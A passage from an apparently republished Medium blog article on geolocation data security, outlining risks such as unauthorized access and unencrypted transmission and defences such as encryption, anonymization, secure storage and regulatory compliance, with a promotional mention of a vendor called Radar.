Its very openness, which fuels its benefits, also renders it vulnerable. As we delve further into this subject, we'll explore the inherent risks of geolocation data, highlighting potential cybersecurity threats and the urgent need for stringent security measures.Unauthorized access and misuseUnauthorized access is the act of gaining access to geolocation data without permission. It's a common form of data breach, threatening individual privacy. Misuse, on the other hand, involves manipulating this data for malicious intent. This could include stalking, identity theft, or even burglary.Inaccurate or fake location dataInaccurate or fake location data introduces uncertainty and risk to digital interactions. Inaccuracy can stem from technical glitches or environmental factors, compromising the reliability of geolocation services.Meanwhile, fake location data, often deliberately manipulated, disrupts the authenticity of user profiles and can lead to deceptive practices, skewing marketing data or enabling evasion of geo-restrictions.The lack of data encryptionThe absence of data encryption in geolocation data transmission presents serious security implications. Without encryption, the data passes in plain text form, accessible and readable to anyone intercepting the transmission. This gives cybercriminals an open gateway to access sensitive information, leading to potential misuse.The Role of Geolocation Security in a Hyper-Connected WorldImage by TheDigitalArtist on PixabayIn our digitally-driven world, geolocation data serves as a vital cog, transforming user experiences across multiple spheres. Yet, its potential vulnerabilities necessitate robust security measures. This section delves into the importance of geolocation security.Improved personal privacyGeolocation security plays a pivotal role in enhancing personal privacy. It ensures the confidentiality of location data, preventing unauthorized access and potential misuse. This protection affords users the freedom to engage online, safe in the knowledge that their whereabouts remain private.Robust security measures also deter potential data breaches, fortifying the line of defense against cyber threats. In essence, sound geolocation security safeguards the sanctity of personal privacy in our digital world.Secures corporate dataGeolocation security is crucial in preserving corporate data. It aids in the prevention of data breaches by securing sensitive location information related to businesses. The safeguarding of such data can help deter cyber-attacks aimed at exploiting corporate vulnerabilities.Moreover, by ensuring the accuracy of geolocation data, businesses can maintain the integrity of their services, foster trust with customers, and avoid costly inaccuracies.Solutions and Best Practices for Protecting Geolocation DataAs we continue to rely on technology in our day-to-day lives, the importance of protecting geolocation data becomes increasingly vital. This section aims to shed light on practical solutions and best practices that can help individuals and organizations alike safeguard this sensitive information.From data encryption techniques to legal frameworks, we will explore a holistic approach to securing geolocation data in our hyper-connected world.Spotlight on Radar: A pioneer in geolocation securityRadar, a trailblazer in geolocation security, provides robust solutions for managing location data. Their platform offers effective data management tools, ensuring accuracy and authenticity. Radar's proactive measures help mitigate potential threats, ensuring data privacy and maintaining user trust. Their commitment to geolocation security demonstrates their pivotal role in this critical field.Encryption and anonymizationEncryption and anonymization are key strategies for securing geolocation data. Encryption transforms data into a coded format, readable only with a decryption key. This ensures the data's confidentiality during transmission.On the other hand, anonymization removes identifiable information from the data set, safeguarding user privacy. This practice renders the data useless to unauthorized users, effectively protecting identities and other information.Secure data storageSecure data storage is the process of safeguarding digital information in a protected environment. This can be a physical data center or a virtual cloud storage system. It employs multiple security measures, including encryption, password protection, and controlled access, to prevent unauthorized access. Regular data backups are also vital, ensuring data integrity and recovery in case of loss or damage.Compliance with regulationsCompliance with regulations is a fundamental aspect of geolocation data protection. Adhering to legal frameworks, such as GDPR, ensures data handling aligns with privacy standards. These measures provide clear guidelines for data collection, storage, and use.Non-compliance can result in severe penalties, damaging your reputation and financial standing. Therefore, understanding and implementing these regulations is crucial in maintaining a secure, law-abiding digital environment.Navigating the Coordinates of Security: Weaving a Framework for Robust Geolocation SecurityNavigating the coordinates of geolocation security is akin to embarking on a digital voyage across a sea of data. Like mariners steering clear of dangerous waters, we must conscientiously protect our precious cargo of location data. As we harness the winds of technology, encryption, anonymization, and secure data storage become our navigational tools, guiding us toward a safe harbor of privacy and data integrity. Compliance with regulations lights up our path like a lighthouse guiding ships to safety.In conclusion, the importance of geolocation security in our interconnected world cannot be understated. It's the compass that keeps us on course in this digital age, protecting our data and privacy. In essence, it safeguards the authenticity of our digital identities and interactions.Rising Importance of Geolocation Security in a Hyper-Connected World was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.

geolocation data Geolocation Security